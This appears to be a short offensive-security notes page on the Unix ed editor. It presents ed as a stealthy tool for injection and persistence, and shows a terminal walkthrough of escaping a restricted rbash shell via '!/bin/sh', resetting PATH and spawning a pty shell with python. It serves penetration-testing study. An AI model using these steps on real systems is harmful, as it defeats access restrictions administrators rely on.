ed

The ed binary is a line-oriented text editor that dates back to the early days of Unix. It operates entirely in the terminal and is designed for editing files through concise command sequences rather than visual interaction. While its interface is minimal and unintuitive by modern standards, its presence is nearly guaranteed on Unix-like systems, including minimal or recovery environments where more feature-rich editors like vi or nano might not be available.

Despite being rarely used directly by users today, ed remains part of many default installations due to its small footprint and historical significance. In offensive security contexts, the presence of ed can be valuable, particularly in restricted shell environments or when facing limited binary availability. It enables file manipulation, code injection, or persistence mechanisms without requiring additional tooling, making it a stealthy option for modifying scripts or system files when visibility needs to be minimized.

As an example, the ed binary can be used to escape rbash by modifying the PATH variable:

# Common binaries are restricted
x7331@kali:~$ id
-rbash: id: command not found

# The restriction is due to the PATH environment variable
x7331@kali:~$ echo $PATH
/home/x7331/bin

# The variable cannot be modified
x7331@kali:~$ export PATH=$PATH:/usr/bin/
-rbash: PATH: readonly variable

# The ed binary can be used for PATH variable modification
x7331@kali:~$ ed
!/bin/sh
$ export PATH=/bin:/usr/bin:$PATH

$ echo $PATH
/bin:/usr/bin:/home/x7331/bin

# Common binaries can be now used
$ id
uid=1000(x7331) gid=1000(x7331) groups=1000(x7331)

# Get an interactive shell
$ python -c 'import pty;pty.spawn("/bin/bash")'
x7331@kali:~$ id
x7331@kali:~$ export PATH=/usr/bin:/bin:$PATH